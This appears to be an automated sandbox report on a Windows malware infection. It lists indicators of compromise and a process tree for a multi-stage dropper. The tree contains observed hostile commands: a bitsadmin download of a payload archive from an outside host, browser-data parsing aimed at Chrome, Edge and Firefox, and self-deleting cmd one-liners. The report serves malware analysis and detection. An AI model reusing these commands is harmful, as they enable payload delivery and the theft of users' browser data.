Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe 1296 Mekicaeshaebae.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3016 Process not Found -
Suspicious behavior: MapViewOfSection 46 IoCs
pid Process 5932 toolspab1.exe 4644 parse.exe 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 4688 essscbj 5168 hjsscbj 2404 explorer.exe 2404 explorer.exe 4312 explorer.exe 4312 explorer.exe 4312 explorer.exe 4312 explorer.exe 5404 explorer.exe 5404 explorer.exe 5404 explorer.exe 5404 explorer.exe 2404 explorer.exe 2404 explorer.exe 4924 MicrosoftEdgeCP.exe 4924 MicrosoftEdgeCP.exe 2404 explorer.exe 2404 explorer.exe 4312 explorer.exe 4312 explorer.exe 5404 explorer.exe 5404 explorer.exe 5712 hjsscbj 5344 essscbj 4972 hjsscbj 5880 essscbj -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2812 Ultra.exe Token: SeDebugPrivilege 3952 Lusonamana.exe Token: SeDebugPrivilege 1296 Mekicaeshaebae.exe Token: SeDebugPrivilege 4608 MicrosoftEdge.exe Token: SeDebugPrivilege 4608 MicrosoftEdge.exe Token: SeDebugPrivilege 4608 MicrosoftEdge.exe Token: SeDebugPrivilege 4608 MicrosoftEdge.exe Token: SeDebugPrivilege 4660 rundll32.exe Token: SeDebugPrivilege 4660 rundll32.exe Token: SeTcbPrivilege 3212 svchost.exe Token: SeDebugPrivilege 4660 rundll32.exe Token: SeDebugPrivilege 4660 rundll32.exe Token: SeDebugPrivilege 4660 rundll32.exe Token: SeDebugPrivilege 4660 rundll32.exe Token: SeAuditPrivilege 2408 svchost.exe Token: SeDebugPrivilege 4660 rundll32.exe Token: SeDebugPrivilege 4660 rundll32.exe Token: SeAuditPrivilege 2408 svchost.exe Token: SeDebugPrivilege 4580 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4580 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4580 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4580 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4660 rundll32.exe Token: SeDebugPrivilege 4660 rundll32.exe Token: SeDebugPrivilege 4660 rundll32.exe Token: SeDebugPrivilege 4660 rundll32.exe Token: SeDebugPrivilege 4660 rundll32.exe Token: SeAssignPrimaryTokenPrivilege 2700 svchost.exe Token: SeIncreaseQuotaPrivilege 2700 svchost.exe Token: SeSecurityPrivilege 2700 svchost.exe Token: SeTakeOwnershipPrivilege 2700 svchost.exe Token: SeLoadDriverPrivilege 2700 svchost.exe Token: SeSystemtimePrivilege 2700 svchost.exe Token: SeBackupPrivilege 2700 svchost.exe Token: SeRestorePrivilege 2700 svchost.exe Token: SeShutdownPrivilege 2700 svchost.exe Token: SeSystemEnvironmentPrivilege 2700 svchost.exe Token: SeUndockPrivilege 2700 svchost.exe Token: SeManageVolumePrivilege 2700 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2700 svchost.exe Token: SeIncreaseQuotaPrivilege 2700 svchost.exe Token: SeSecurityPrivilege 2700 svchost.exe Token: SeTakeOwnershipPrivilege 2700 svchost.exe Token: SeLoadDriverPrivilege 2700 svchost.exe Token: SeSystemtimePrivilege 2700 svchost.exe Token: SeBackupPrivilege 2700 svchost.exe Token: SeRestorePrivilege 2700 svchost.exe Token: SeShutdownPrivilege 2700 svchost.exe Token: SeSystemEnvironmentPrivilege 2700 svchost.exe Token: SeUndockPrivilege 2700 svchost.exe Token: SeManageVolumePrivilege 2700 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2700 svchost.exe Token: SeIncreaseQuotaPrivilege 2700 svchost.exe Token: SeSecurityPrivilege 2700 svchost.exe Token: SeTakeOwnershipPrivilege 2700 svchost.exe Token: SeLoadDriverPrivilege 2700 svchost.exe Token: SeSystemtimePrivilege 2700 svchost.exe Token: SeBackupPrivilege 2700 svchost.exe Token: SeRestorePrivilege 2700 svchost.exe Token: SeShutdownPrivilege 2700 svchost.exe Token: SeSystemEnvironmentPrivilege 2700 svchost.exe Token: SeUndockPrivilege 2700 svchost.exe Token: SeManageVolumePrivilege 2700 svchost.exe Token: SeAuditPrivilege 2408 svchost.exe -
Suspicious use of FindShellTrayWindow 9 IoCs
pid Process 1684 ultramediaburner.tmp 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 4608 MicrosoftEdge.exe 4168 MicrosoftEdgeCP.exe 4440 google-game.exe 4440 google-game.exe 4168 MicrosoftEdgeCP.exe 3596 MicrosoftEdge.exe 4924 MicrosoftEdgeCP.exe 4924 MicrosoftEdgeCP.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3016 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1808 wrote to memory of 3868 1808 Install.exe 75 PID 1808 wrote to memory of 3868 1808 Install.exe 75 PID 1808 wrote to memory of 3868 1808 Install.exe 75 PID 3868 wrote to memory of 2812 3868 Install.tmp 77 PID 3868 wrote to memory of 2812 3868 Install.tmp 77 PID 2812 wrote to memory of 3848 2812 Ultra.exe 78 PID 2812 wrote to memory of 3848 2812 Ultra.exe 78 PID 2812 wrote to memory of 3848 2812 Ultra.exe 78 PID 3848 wrote to memory of 1684 3848 ultramediaburner.exe 79 PID 3848 wrote to memory of 1684 3848 ultramediaburner.exe 79 PID 3848 wrote to memory of 1684 3848 ultramediaburner.exe 79 PID 2812 wrote to memory of 3952 2812 Ultra.exe 80 PID 2812 wrote to memory of 3952 2812 Ultra.exe 80 PID 2812 wrote to memory of 1296 2812 svchost.exe 81 PID 2812 wrote to memory of 1296 2812 svchost.exe 81 PID 1684 wrote to memory of 2496 1684 ultramediaburner.tmp 82 PID 1684 wrote to memory of 2496 1684 ultramediaburner.tmp 82 PID 1296 wrote to memory of 4312 1296 Mekicaeshaebae.exe 167 PID 1296 wrote to memory of 4312 1296 Mekicaeshaebae.exe 167 PID 1296 wrote to memory of 4524 1296 Mekicaeshaebae.exe 87 PID 1296 wrote to memory of 4524 1296 Mekicaeshaebae.exe 87 PID 4312 wrote to memory of 4764 4312 explorer.exe 91 PID 4312 wrote to memory of 4764 4312 explorer.exe 91 PID 4312 wrote to memory of 4764 4312 explorer.exe 91 PID 1296 wrote to memory of 4240 1296 Mekicaeshaebae.exe 107 PID 1296 wrote to memory of 4240 1296 Mekicaeshaebae.exe 107 PID 4240 wrote to memory of 4440 4240 Conhost.exe 95 PID 4240 wrote to memory of 4440 4240 Conhost.exe 95 PID 4240 wrote to memory of 4440 4240 Conhost.exe 95 PID 4440 wrote to memory of 4660 4440 google-game.exe 97 PID 4440 wrote to memory of 4660 4440 google-game.exe 97 PID 4440 wrote to memory of 4660 4440 google-game.exe 97 PID 4660 wrote to memory of 3212 4660 rundll32.exe 69 PID 4660 wrote to memory of 2740 4660 rundll32.exe 36 PID 1296 wrote to memory of 4864 1296 Mekicaeshaebae.exe 98 PID 1296 wrote to memory of 4864 1296 Mekicaeshaebae.exe 98 PID 3212 wrote to memory of 2812 3212 svchost.exe 101 PID 3212 wrote to memory of 2812 3212 svchost.exe 101 PID 3212 wrote to memory of 2812 3212 svchost.exe 101 PID 4660 wrote to memory of 992 4660 rundll32.exe 52 PID 4660 wrote to memory of 2436 4660 rundll32.exe 41 PID 4660 wrote to memory of 2408 4660 rundll32.exe 42 PID 4660 wrote to memory of 1072 4660 rundll32.exe 25 PID 4660 wrote to memory of 860 4660 rundll32.exe 48 PID 4660 wrote to memory of 1392 4660 rundll32.exe 17 PID 4660 wrote to memory of 1860 4660 rundll32.exe 47 PID 1296 wrote to memory of 4796 1296 Mekicaeshaebae.exe 102 PID 1296 wrote to memory of 4796 1296 Mekicaeshaebae.exe 102 PID 4660 wrote to memory of 1172 4660 rundll32.exe 9 PID 4660 wrote to memory of 1360 4660 rundll32.exe 19 PID 4864 wrote to memory of 1284 4864 cmd.exe 104 PID 4864 wrote to memory of 1284 4864 cmd.exe 104 PID 4864 wrote to memory of 1284 4864 cmd.exe 104 PID 4660 wrote to memory of 2700 4660 rundll32.exe 38 PID 4660 wrote to memory of 2720 4660 rundll32.exe 33 PID 1296 wrote to memory of 4892 1296 Mekicaeshaebae.exe 106 PID 1296 wrote to memory of 4892 1296 Mekicaeshaebae.exe 106 PID 4796 wrote to memory of 388 4796 cmd.exe 108 PID 4796 wrote to memory of 388 4796 cmd.exe 108 PID 4796 wrote to memory of 388 4796 cmd.exe 108 PID 1296 wrote to memory of 5204 1296 Mekicaeshaebae.exe 110 PID 1296 wrote to memory of 5204 1296 Mekicaeshaebae.exe 110 PID 388 wrote to memory of 5448 388 ATNQTNNRIP.exe 112 PID 388 wrote to memory of 5448 388 ATNQTNNRIP.exe 112
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1172
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1392
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1360
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1072
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2720
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2740
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2436
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1860
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:860 -
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\Program Files (x86)\NDiMKFpxJkgR\NDiMKFpxJkgR.dll",NDiMKFpxJkgR2⤵
- Windows security modification
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2232
-
-
C:\Users\Admin\AppData\Roaming\essscbjC:\Users\Admin\AppData\Roaming\essscbj2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4688
-
-
C:\Users\Admin\AppData\Roaming\hjsscbjC:\Users\Admin\AppData\Roaming\hjsscbj2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5896 -
C:\Users\Admin\AppData\Roaming\hjsscbjC:\Users\Admin\AppData\Roaming\hjsscbj3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5168
-
-
-
C:\Users\Admin\AppData\Roaming\essscbjC:\Users\Admin\AppData\Roaming\essscbj2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5344
-
-
C:\Users\Admin\AppData\Roaming\hjsscbjC:\Users\Admin\AppData\Roaming\hjsscbj2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4928 -
C:\Users\Admin\AppData\Roaming\hjsscbjC:\Users\Admin\AppData\Roaming\hjsscbj3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5712
-
-
-
C:\Users\Admin\AppData\Roaming\hjsscbjC:\Users\Admin\AppData\Roaming\hjsscbj2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6128 -
C:\Users\Admin\AppData\Roaming\hjsscbjC:\Users\Admin\AppData\Roaming\hjsscbj3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4972
-
-
-
C:\Users\Admin\AppData\Roaming\essscbjC:\Users\Admin\AppData\Roaming\essscbj2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5880
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:992
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Users\Admin\AppData\Local\Temp\is-81L4S.tmp\Install.tmp"C:\Users\Admin\AppData\Local\Temp\is-81L4S.tmp\Install.tmp" /SL5="$70068,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Users\Admin\AppData\Local\Temp\is-2SARL.tmp\Ultra.exe"C:\Users\Admin\AppData\Local\Temp\is-2SARL.tmp\Ultra.exe" /S /UID=burnerch13⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Program Files\Windows Media Player\AZVQLOGSSH\ultramediaburner.exe"C:\Program Files\Windows Media Player\AZVQLOGSSH\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Users\Admin\AppData\Local\Temp\is-HNI0R.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-HNI0R.tmp\ultramediaburner.tmp" /SL5="$70058,281924,62464,C:\Program Files\Windows Media Player\AZVQLOGSSH\ultramediaburner.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu6⤵
- Executes dropped EXE
PID:2496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a6-861d4-3d7-622ae-bd48e2001125d\Lusonamana.exe"C:\Users\Admin\AppData\Local\Temp\a6-861d4-3d7-622ae-bd48e2001125d\Lusonamana.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:3952
-
-
C:\Users\Admin\AppData\Local\Temp\4e-4e2da-0d5-5b6b1-843901cf97b21\Mekicaeshaebae.exe"C:\Users\Admin\AppData\Local\Temp\4e-4e2da-0d5-5b6b1-843901cf97b21\Mekicaeshaebae.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n2achrmz.4g5\instEU.exe & exit5⤵PID:4312
-
C:\Users\Admin\AppData\Local\Temp\n2achrmz.4g5\instEU.exeC:\Users\Admin\AppData\Local\Temp\n2achrmz.4g5\instEU.exe6⤵
- Executes dropped EXE
PID:4764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1xee5dzn.svv\gpooe.exe & exit5⤵PID:4524
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sewzcryq.v51\google-game.exe & exit5⤵PID:4240
-
C:\Users\Admin\AppData\Local\Temp\sewzcryq.v51\google-game.exeC:\Users\Admin\AppData\Local\Temp\sewzcryq.v51\google-game.exe6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install7⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4660
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ce12vtwg.hpi\md1_1eaf.exe & exit5⤵
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Users\Admin\AppData\Local\Temp\ce12vtwg.hpi\md1_1eaf.exeC:\Users\Admin\AppData\Local\Temp\ce12vtwg.hpi\md1_1eaf.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wrqwwjhk.zrt\ATNQTNNRIP.exe & exit5⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Users\Admin\AppData\Local\Temp\wrqwwjhk.zrt\ATNQTNNRIP.exeC:\Users\Admin\AppData\Local\Temp\wrqwwjhk.zrt\ATNQTNNRIP.exe6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5448 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b firefox8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4768
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b edge8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1740
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b chrome8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4644
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5tu1lugk.bnh\y1.exe & exit5⤵PID:4892
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of WriteProcessMemory
PID:4240
-
-
C:\Users\Admin\AppData\Local\Temp\5tu1lugk.bnh\y1.exeC:\Users\Admin\AppData\Local\Temp\5tu1lugk.bnh\y1.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5460 -
C:\Users\Admin\AppData\Local\Temp\mBDd5Qz6Fz.exe"C:\Users\Admin\AppData\Local\Temp\mBDd5Qz6Fz.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
PID:5292 -
C:\Users\Admin\AppData\Roaming\1619153555755.exe"C:\Users\Admin\AppData\Roaming\1619153555755.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619153555755.txt"8⤵
- Executes dropped EXE
PID:4180
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\mBDd5Qz6Fz.exe"8⤵PID:6000
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 39⤵
- Runs ping.exe
PID:2940
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\5tu1lugk.bnh\y1.exe"7⤵
- Executes dropped EXE
PID:4900 -
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:6008
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\billgmhb.p5q\toolspab1.exe & exit5⤵PID:5204
-
C:\Users\Admin\AppData\Local\Temp\billgmhb.p5q\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\billgmhb.p5q\toolspab1.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5648 -
C:\Users\Admin\AppData\Local\Temp\billgmhb.p5q\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\billgmhb.p5q\toolspab1.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5932
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\afnysf4a.lt4\SunLabsPlayer.exe /S & exit5⤵PID:5572
-
C:\Users\Admin\AppData\Local\Temp\afnysf4a.lt4\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\afnysf4a.lt4\SunLabsPlayer.exe /S6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:6080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:5124
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:5368
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:5520
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:5240
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:5720
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:5820
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵
- Checks for any installed AV software in registry
PID:5960
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z7⤵
- Download via BitsAdmin
PID:5388
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -prTDOFdKdg0AwPyT -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵
- Executes dropped EXE
PID:4968
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pKy3kiYTtiH69n3y -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5024
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:5976
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:4116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:4844
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:1632
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:4196
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NDiMKFpxJkgR\NDiMKFpxJkgR.dll" NDiMKFpxJkgR7⤵
- Loads dropped DLL
PID:5636 -
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NDiMKFpxJkgR\NDiMKFpxJkgR.dll" NDiMKFpxJkgR8⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:4344
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:5496
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:4820
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:4088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:4112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdDB25.tmp\tempfile.ps1"7⤵PID:4572
-
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4248
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pyn5kdo2.5t2\GcleanerWW.exe /mixone & exit5⤵PID:5824
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oo0vexo4.bmn\inst.exe & exit5⤵PID:5916
-
C:\Users\Admin\AppData\Local\Temp\oo0vexo4.bmn\inst.exeC:\Users\Admin\AppData\Local\Temp\oo0vexo4.bmn\inst.exe6⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\31sgbdye.p4u\c7ae36fa.exe & exit5⤵PID:6048
-
C:\Users\Admin\AppData\Local\Temp\31sgbdye.p4u\c7ae36fa.exeC:\Users\Admin\AppData\Local\Temp\31sgbdye.p4u\c7ae36fa.exe6⤵PID:4644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b3a2jmgz.lkj\app.exe /8-2222 & exit5⤵PID:5400
-
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2812
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4608
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4708
-
